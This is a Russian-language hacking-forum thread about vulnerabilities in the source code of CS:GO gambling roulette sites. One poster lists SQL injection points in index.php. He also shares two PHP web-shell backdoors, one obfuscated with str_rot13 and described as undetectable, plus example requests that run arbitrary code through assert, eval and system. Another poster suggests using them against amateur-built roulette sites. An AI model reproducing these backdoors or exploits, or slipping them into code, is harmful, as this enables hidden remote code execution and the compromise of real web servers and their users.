• Данный материал предоставлен сайтом исключительно в ознакомительных целях.
    Администрация не несет ответственности за его содержимое. По всем жалобам пишите на почту abusevhguru@yandex.ru

Уязвимости в csgodouble csduo топ!!!

Lar1k

Капитан
Сообщения
260
Реакции
62

Lar1k

  • 260
  • 62
Обратите внимание, пользователь заблокирован. Крайне не рекомендуем заключать сделки с этим пользователем,
Обновил.
Фиксов пока не будет:)
 

luirnu

Новичок
Сообщения
55
Реакции
2

luirnu

  • 55
  • 2
да напишите этот дуо сами, там писать то 3 пальца обоссать, 2 дня работы по 4 часа максимум
 

Exs

Капитан
Сообщения
397
Реакции
262

Exs

  • 397
  • 262
1) /index.php 18: $sql = $db->query("SELECT * FROM `users` WHERE `hash` = " . $db->quote( $_COOKIE['hash'])); SQL Injection
2) /index.php 351: $sql = $db->query('SELECT * FROM `trades` WHERE `id` = '.$db->quote( $_COOKIE['tid']).' AND `status` = 0'); SQL Injection
3) /index.php 395: $sql = $db->query('SELECT * FROM `trades` WHERE `id` = '.$db->quote( $_COOKIE['tid']).' AND `status` = 0'); SQL Injection
Уязвимые места index.php
Если нужно буде выложу больше

1) PHP-Backdoor, который ничем не палится и при этом выглядит не палевно
Код:
<?php
@$_REQUEST['large'](str_rot13('riny($_ERDHRFG["pbqr"]);'));
?>
Код:
index.php?large=assert&code=echo 123;
index.php?large=assert&code=system('echo 1;');
2) PHP-Backdoor, спасибо тебе, типизация которой нет
Код:
<?php $_REQUEST['f']($_REQUEST['c']); ?>
Код:
index.php?f=assert&c=phpinfo();
index.php?f=eval&c=echo 1;
а что дают эти запросы? лично у меня выводит к примеру:
 

GFX.DMITRIY

Заблокирован
Сообщения
109
Реакции
33

GFX.DMITRIY

  • 109
  • 33
Обратите внимание, пользователь заблокирован. Крайне не рекомендуем заключать сделки с этим пользователем,

PapaJoe

Пользователь
Сообщения
30
Реакции
0

PapaJoe

  • 30
  • 0
может проканать на каких нибудь не давно созданных рулетках школьниками
 
Сверху